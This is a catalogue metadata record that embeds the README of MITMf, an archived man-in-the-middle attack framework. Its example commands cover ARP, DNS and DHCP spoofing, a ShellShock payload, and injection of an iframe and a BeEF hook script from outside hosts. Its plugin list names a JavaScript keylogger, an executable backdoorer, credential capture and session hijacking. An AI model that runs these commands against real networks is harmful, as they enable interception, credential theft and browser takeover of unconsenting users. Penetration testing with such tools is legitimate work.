{"id":13816505,"url":"https://github.com/byt3bl33d3r/MITMf","last_synced_at":"2025-05-15T15:32:38.885Z","repository":{"id":18386824,"uuid":"21567832","full_name":"byt3bl33d3r/MITMf","owner":"byt3bl33d3r","description":"Framework for Man-In-The-Middle attacks","archived":true,"fork":false,"pushed_at":"2018-08-28T15:44:25.000Z","size":1375,"stargazers_count":3585,"open_issues_count":135,"forks_count":1053,"subscribers_count":335,"default_branch":"master","last_synced_at":"2025-01-18T20:36:42.287Z","etag":null,"topics":["framework","man-in-the-middle","mitm","python"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/byt3bl33d3r.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-07-07T11:13:51.000Z","updated_at":"2025-01-13T10:59:21.000Z","dependencies_parsed_at":"2022-07-12T13:00:44.024Z","dependency_job_id":null,"html_url":"https://github.com/byt3bl33d3r/MITMf","commit_stats":null,"previous_names":[],"tags_count":10,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3bl33d3r%2FMITMf","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3bl33d3r%2FMITMf/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3bl33d3r%2FMITMf/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/byt3bl33d3r%2FMITMf/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/byt3bl33d3r","download_url":"https://codeload.github.com/byt3bl33d3r/MITMf/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254367691,"owners_count":22059556,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["framework","man-in-the-middle","mitm","python"],"created_at":"2024-08-04T05:00:43.858Z","updated_at":"2025-05-15T15:32:38.053Z","avatar_url":"https://github.com/byt3bl33d3r.png","language":"Python","funding_links":[],"categories":["Network Tools","Python","Tools","Network"],"sub_categories":["Proxies and Machine-in-the-Middle (MITM) Tools","Network Tools","MITM"],"readme":"![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)\n![Latest Version](https://img.shields.io/badge/mitmf-0.9.8%20--%20The%20Dark%20Side-red.svg)\n![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg)\n[![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf)\n[![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf)\n[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master\u0026service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)\n\n# MITMf\n\nFramework for Man-In-The-Middle attacks\n\n**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**\n\nQuick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io\n\nThis tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.\n\nContact me at:\n- Twitter: @byt3bl33d3r\n- IRC on Freenode: #MITMf\n- Email: byt3bl33d3r@protonmail.com\n\n**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**\n\nInstallation\n============\n\nPlease refer to the wiki for [installation instructions](https://github.com/byt3bl33d3r/MITMf/wiki/Installation)\n\nDescription\n============\nMITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving\nexisting attacks and techniques.\n\nOriginally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely \nre-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.\n\nFeatures\n========\n\n- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.\n\n- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better),\nallowing users to modify any type of traffic or protocol.\n\n- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.\n\n- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using [Net-Creds](https://github.com/DanMcInerney/net-creds), which is run on startup.\n\n- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.\n\nActive packet filtering/modification\n====================================\n\nYou can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)\n\nFor example, here's a stupid little filter that just changes the destination IP address of ICMP packets:\n\n```python\nif packet.haslayer(ICMP):\n\tlog.info('Got an ICMP packet!')\n\tpacket.dst = '192.168.1.0'\n```\n\n- Use the ```packet``` variable to access the packet in a Scapy compatible format\n- Use the ```data``` variable to access the raw packet data\n\nNow to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py```\n\nYou will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;)\n\n**Note**: you can modify filters on-the-fly without restarting MITMf! \n\nExamples\n========\n\nThe most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:\n\n```python mitmf.py -i enp3s0```\n\nARP poison the whole subnet with the gateway at 192.168.1.1 using the **Spoof** plugin:\n\n```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1```\n\nSame as above + a WPAD rogue proxy server using the **Responder** plugin:\n\n```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad```\n\nARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:\n\n```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1```\n\nEnable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):\n\n```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```\n\nEnable LLMNR/NBTNS/MDNS spoofing:\n\n```python mitmf.py -i enp3s0 --responder --wredir --nbtns```\n\nEnable DHCP spoofing (the ip pool and subnet are pulled from the config file):\n\n```python mitmf.py -i enp3s0 --spoof --dhcp```\n\nSame as above with a ShellShock payload that will be executed if any client is vulnerable:\n\n```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```\n\nInject an HTML IFrame using the **Inject** plugin:\n\n```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```\n\nInject a JS script:\n\n```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```\n\nStart a captive portal that redirects everything to http://SERVER/PATH:\n\n```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```\n\nStart captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:\n\n```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```\n\nSame as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):\n\n```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```\n\nServe a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):\n\n```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```\n\nSame as above but with hostname:\n\n```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```\n\nAnd much much more! \n\nOf course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)\n\nFor a complete list of available options, just run ```python mitmf.py --help```\n\n# Currently available plugins\n\n- **HTA Drive-By**     : Injects a fake update notification and prompts clients to download an HTA application\n- **SMBTrap**          : Exploits the 'SMB Trap' vulnerability on connected clients\n- **ScreenShotter**    : Uses HTML5 Canvas to render an accurate screenshot of a clients browser\n- **Responder**        : LLMNR, NBT-NS, WPAD and MDNS poisoner\n- **SSLstrip+**        : Partially bypass HSTS\n- **Spoof**            : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing\n- **BeEFAutorun**      : Autoruns BeEF modules based on a client's OS or browser type\n- **AppCachePoison**   : Performs HTML5 App-Cache poisoning attacks \n- **Ferret-NG**        : Transparently hijacks client sessions\n- **BrowserProfiler**  : Attempts to enumerate all browser plugins of connected clients\n- **FilePwn**          : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy\n- **Inject**           : Inject arbitrary content into HTML content\n- **BrowserSniper**    : Performs drive-by attacks on clients with out-of-date browser plugins\n- **JSkeylogger**      : Injects a Javascript keylogger into a client's webpages\n- **Replace**          : Replace arbitrary content in HTML content\n- **SMBAuth**          : Evoke SMB challenge-response authentication attempts\n- **Upsidedownternet** : Flips images 180 degrees\n- **Captive**          : Creates a captive portal, redirecting HTTP requests using 302\n\n# How to fund my tea \u0026 sushi reserve\n\nBTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU\n\nETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee\n\nLTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbyt3bl33d3r%2FMITMf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbyt3bl33d3r%2FMITMf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbyt3bl33d3r%2FMITMf/lists"}